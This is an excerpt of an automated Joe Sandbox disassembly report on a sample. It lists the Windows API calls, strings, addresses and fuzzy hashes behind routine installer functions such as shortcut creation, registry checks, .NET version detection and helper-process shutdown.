                                                                          • 73A0A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                          • 73A14C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                          • 73A0A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                          • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                          • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Object$Select$Delete$A16180A480A570Stretch
                                                                          • String ID:
                                                                          • API String ID: 3135053572-0
                                                                          • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                          • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                                          • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                          • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                                          APIs
                                                                            • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00471CA0
                                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00471D9F
                                                                          • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00471DB5
                                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00471DDA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                          • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                          • API String ID: 971782779-3668018701
                                                                          • Opcode ID: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                          • Instruction ID: db08b3a78c5346aa08fc53deac37c7c900aaeab2e7ee66e1d047288e3336f214
                                                                          • Opcode Fuzzy Hash: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                          • Instruction Fuzzy Hash: 55D11374A00149AFDB11EFA9D882BDDB7F5AF48304F50806AF804B7391D778AE45CB69
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,?,00000000,?,00000000,00454029,?,0045A28A,00000003,00000000,00000000,00454060), ref: 00453EA9
                                                                            • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                          • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F2D
                                                                          • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F5C
                                                                          Strings
                                                                          • RegOpenKeyEx, xrefs: 00453E2C
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453E00
                                                                          • , xrefs: 00453E1A
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453DC7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$FormatMessageOpen
                                                                          • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                          • API String ID: 2812809588-1577016196
                                                                          • Opcode ID: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                          • Instruction ID: 0c0f272a557b88975729148cb7875cb844f630b1a696a545db65abb6b51d3efb
                                                                          • Opcode Fuzzy Hash: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                          • Instruction Fuzzy Hash: 9D912271E04208ABDB11DF95D942BDEB7F8EB48745F10406BF901FB282D6789E09CB69
                                                                          APIs
                                                                            • Part of subcall function 00458A84: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C1F
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C89
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458CF0
                                                                          Strings
                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00458CA3
                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00458C3C
                                                                          • v2.0.50727, xrefs: 00458C7B
                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00458BD2
                                                                          • v1.1.4322, xrefs: 00458CE2
                                                                          • .NET Framework version %s not found, xrefs: 00458D29
                                                                          • .NET Framework not found, xrefs: 00458D3D
                                                                          • v4.0.30319, xrefs: 00458C11
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Close$Open
                                                                          • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                          • API String ID: 2976201327-446240816
                                                                          • Opcode ID: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                          • Instruction ID: 32352305a0336a12336774107b7ff5a8d04594bb7e4f1119dbb0a5d8803071dd
                                                                          • Opcode Fuzzy Hash: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                          • Instruction Fuzzy Hash: 7351D430A041485BCB00DB65C861BEE77B6DB99305F14447FE941EB393DF399A0E8B69
APIs
• CloseHandle.KERNEL32(?), ref: 0045819B
• TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004581B7
• WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004581C5
• GetExitCodeProcess.KERNEL32(?), ref: 004581D6
• CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045821D
• Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458239
Strings
• Helper process exited, but failed to get exit code., xrefs: 0045820F
• Helper process exited., xrefs: 004581E5
• Helper isn't responding; killing it., xrefs: 004581A7
• Stopping 64-bit helper process. (PID: %u), xrefs: 0045818D
• Helper process exited with failure code: 0x%x, xrefs: 00458203
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
• String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
• API String ID: 3355656108-1243109208
• Opcode ID: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
• Instruction ID: ca0659a1f7dd3987533feb970b51f52a81168d3092bf9212e29b303cc353bad7
• Opcode Fuzzy Hash: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
• Instruction Fuzzy Hash: 79217170604B409AD720E7B9C44574B7AD49F49305F048C6FF99AEB293DE78E8488B2A
APIs
  • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453B6B
• RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453CA7
  • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
Strings
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453AB3
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453A83
• RegCreateKeyEx, xrefs: 00453ADF
• , xrefs: 00453ACD
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: CloseCreateFormatMessageQueryValue
• String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
• API String ID: 2481121983-1280779767
• Opcode ID: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
• Instruction ID: 9af730bdb9cddd4578bad4c79146292dd217fd331dbe672fdf24ed7127d9b52a
• Opcode Fuzzy Hash: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
• Instruction Fuzzy Hash: 89811076A00209AFDB01DFD5C941BDEB7B9EF48345F50442AF900F7282D778AE498B69
APIs
  • Part of subcall function 00452F1C: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
  • Part of subcall function 00452F1C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
• CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00495129
• SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049527D), ref: 0049514A
• CreateWindowExA.USER32(00000000,STATIC,0049528C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00495171
• SetWindowLongA.USER32(?,000000FC,00494904), ref: 00495184
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC,0049528C), ref: 004951B4
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00495228
• CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000), ref: 00495234
  • Part of subcall function 0045326C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
• 73A15CF0.USER32(?,00495257,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC), ref: 0049524A
Strings
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
• String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
• API String ID: 170458502-2312673372
• Opcode ID: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
• Instruction ID: 9b82285d6c0ab0379da714a391ea46bab388e10fbcdfaad342ba26a277b4da99
• Opcode Fuzzy Hash: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
• Instruction Fuzzy Hash: 8D416670A40608AFDF01EBA5DC52F9E7BF8EB09704F6045B6F500F7291D7799A008BA8
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E369
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E36F
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E3BD
Strings
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll$mVE
• API String ID: 4190037839-37397897
• Opcode ID: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
• Instruction ID: 8a20d89f11a8313c83dbe49676a31c52bde0b33a6882556ea6b203ed52161f1a
• Opcode Fuzzy Hash: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
• Instruction Fuzzy Hash: 0C212570B00219AFDF10EBA7DC45A9F77A8EB44314F904477A500E7292EB7C9A05CB59
APIs
• GetActiveWindow.USER32 ref: 00462124
• GetModuleHandleA.KERNEL32(user32.dll), ref: 00462138
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462145
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462152
• GetWindowRect.USER32(?,00000000), ref: 0046219E
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004621DC
Strings
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: Window$AddressProc$ActiveHandleModuleRect
• String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
• API String ID: 2610873146-3407710046
• Opcode ID: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
• Instruction ID: fd6996cff919b5887080f465a26ac3447cdf71e0405d1b359808dab19ab714f4
• Opcode Fuzzy Hash: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
• Instruction Fuzzy Hash: A7210771704B006BD300D664CD41F7B36D4EB85710F08052AFA84EB382EAB8DD018A9A
APIs
• GetActiveWindow.USER32 ref: 0042F008
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F01C
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F029
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F036
• GetWindowRect.USER32(?,00000000), ref: 0042F082
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F0C0
Strings
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: Window$AddressProc$ActiveHandleModuleRect
• String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
• API String ID: 2610873146-3407710046
• Opcode ID: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
• Instruction ID: f3027618da4b71ab9256091943579cea75a3e5d7718dd7814224cb4ba64d2bd0
• Opcode Fuzzy Hash: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
• Instruction Fuzzy Hash: 4D21A4767017146FD3109668DC81F3B37A9EB84B14F98453AF984DB382EA78EC048B99
APIs
• CoCreateInstance.OLE32(00498A68,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AC2
• CoCreateInstance.OLE32(00498764,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AE8
• SysFreeString.OLEAUT32(?), ref: 00455C47
Strings
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: CreateInstance$FreeString
• String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue$IShellLink::QueryInterface
• API String ID: 308859552-2052886881
• Opcode ID: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
• Instruction ID: 75ae484d58e3d3074f9f089aff153db97feeda1b73ba6cb4122c168b6c8c5e36
• Opcode Fuzzy Hash: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
• Instruction Fuzzy Hash: 76915171A00604AFDB40DFA9C895BAE77F8AF09305F14446AF904EB262DB78DD08CB59
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045851B,?,00000000,0045857E,?,?,02333858,00000000), ref: 00458399
• TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02333858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 004583F6
• GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02333858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 00458403
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045844F
• GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02333858,?,00000000,004584B0,?,00000000), ref: 00458475
• GetLastError.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02333858,?,00000000,004584B0,?,00000000), ref: 0045847C
  • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
Strings
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
• String ID: CreateEvent$TransactNamedPipe
• API String ID: 2182916169-3012584893
• Opcode ID: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
• Instruction ID: 22acba0fcf61382a58efe17371b9c4a56388ad6b02d4dd4833f4e79bb834958c
• Opcode Fuzzy Hash: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
• Instruction Fuzzy Hash: 8641A475A00608AFDB15DF95CD81F9EB7F8FB49714F1040AAF904F7292DA789E44CA28
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045607D,?,?,00000031,?), ref: 00455F40
                                                                          • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00455F46
                                                                          • LoadTypeLib.OLEAUT32(00000000,?), ref: 00455F93
                                                                            • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                          • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                          • API String ID: 1914119943-2711329623
                                                                          APIs
                                                                          • RectVisible.GDI32(?,?), ref: 00416E23
                                                                          • SaveDC.GDI32(?), ref: 00416E37
                                                                          • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                          • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                          • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                          • DeleteObject.GDI32(?), ref: 00416F32
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                          • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                          • DeleteObject.GDI32(?), ref: 00416F7F
                                                                          Similarity
                                                                          • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                          • String ID:
                                                                          • API String ID: 375863564-0
                                                                          APIs
